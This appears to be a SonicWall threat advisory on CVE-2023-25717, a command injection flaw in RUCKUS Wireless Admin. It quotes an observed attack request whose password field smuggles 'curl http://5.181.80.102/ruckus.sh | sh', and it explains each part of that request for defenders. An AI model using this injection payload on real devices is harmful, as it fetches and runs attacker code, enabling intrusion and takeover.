Ruckus Wireless Remote Code Execution Vulnerability

By

RUCKUS Networks designs, sells and services IT networking products, such as switches, WLAN controllers, Access points, IoT gateways and software. RUCKUS started as wireless only company selling to Internet Service Providers(ISP), Hotel chains, large public venues and later extended to education.

RUCKUS Wireless Admin Remote Code Execution Vulnerability | CVE-2023-25717
RUCKUS Wireless Admin through 10.4 allows Remote Code Execution via an unauthenticated HTTP GET Request, as demonstrated by a /forms/doLogin?login_username=admin&password=password$(curl substring.

Following is a exploit in the wild.

Let’s break down what the attacker is trying to do.

  • login_username=admin: This parameter sets the username to “admin” for the login attempt.
  • password=admin$(curl%20http:// 5.181.80.102/ruckus.sh%20|%20sh: This parameter sets the password for the login attempt. This part of the code is particularly interesting because it includes a command injection attempt.
  • $(curl%20http:// 5.181.80.102/ruckus.sh%20|%20sh
    This part is attempting a command injection by using the $() syntax to execute a command within the password field. The command being executed is:
  • curl http://5.181.80.102/ruckus.sh | sh
    This command is retrieving a shell script (ruckus.sh) from a remote server (at IP address 5.181.80.102) and piping its contents to the sh command, which would effectively run the script’s commands.
    In summary, if this code is successfully executed within the context of a vulnerable system that allows command injection, it could potentially retrieve and execute a shell script from the specified remote server. This can lead to unauthorized access, data breaches, and other malicious actions.

SonicWall Capture Labs provides protection against this threat via the following signature:

  • IPS 15864:Ruckus Wireless Admin RCE

RUCKUS has patched this vulnerability.
Threat Graph

Security News
The SonicWall Capture Labs Threat Research Team gathers, analyzes and vets cross-vector threat information from the SonicWall Capture Threat network, consisting of global devices and resources, including more than 1 million security sensors in nearly 200 countries and territories. The research team identifies, analyzes, and mitigates critical vulnerabilities and malware daily through in-depth research, which drives protection for all SonicWall customers. In addition to safeguarding networks globally, the research team supports the larger threat intelligence community by releasing weekly deep technical analyses of the most critical threats to small businesses, providing critical knowledge that defenders need to protect their networks.